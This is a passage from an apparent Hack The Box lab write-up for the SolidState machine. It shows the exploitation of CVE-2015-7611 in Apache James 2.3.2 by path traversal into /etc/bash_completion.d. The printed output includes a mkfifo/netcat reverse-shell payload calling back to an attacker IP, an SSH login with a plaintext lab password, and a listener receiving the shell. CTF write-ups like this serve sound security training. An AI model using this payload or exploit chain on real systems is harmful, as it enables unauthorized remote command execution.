Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/solidstate]
└─$ python3 CVE-2015-7611.py $IP 10.10.14.5 9999
[+]payload selected (see script for more options): mkfifo /tmp/ahavpa; nc 10.10.14.5 9999 0</tmp/ahavpa | /bin/sh >/tmp/ahavpa 2>&1; rm /tmp/ahavpa
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).Executing the exploit with a custom payload
I don’t need to wait for someone to log in since I already have a restricted SSH access
┌──(kali㉿kali)-[~/archive/htb/labs/solidstate]
└─$ sshpass -p 'P@55W0rd1!2@' ssh mindy@$IP
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
last login: Tue Jan 17 22:38:43 2023 from 10.10.14.5
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errormessagetljava/lang/string: No such file or directory
-rbash: L
lastupdatedtljava/util/date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
message-id: <9152149.0.1674015130719.JavaMail.root@solidstate>
mime-version: 1.0
content-type: text/plain; charset=us-ascii
content-transfer-encoding: 7bit
delivered-to: ../../../../../../../../etc/bash_completion.d@localhost
received: from 10.10.14.5 ([10.10.14.5])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 177
for <../../../../../../../../etc/bash_completion.d@localhost>;
tue, 17 jan 2023 23:11:30 -0500 (EST)
date: Tue, 17 Jan 2023 23:11:30 -0500 (EST)
from: team@team.pl
: No such file or directoryIt is indeed a restricted access with rbash The SSH session hangs
┌──(kali㉿kali)-[~/archive/htb/labs/solidstate]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.51] 37600
whoami
mindy
hostname
solidstate
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:3e:11 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.51/24 brd 10.10.10.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:3e11/64 scope global mngtmpaddr dynamic
valid_lft 86400sec preferred_lft 14400sec
inet6 fe80::250:56ff:feb9:3e11/64 scope link
valid_lft forever preferred_lft foreverThe mindy user logging in via SSH triggered the payload and spawned a session on the local listener. It also effectively escaped rbash
SolidState established to the target system as the mindy user via exploiting CVE-2015-7611 on the target application
note: This would have worked with any user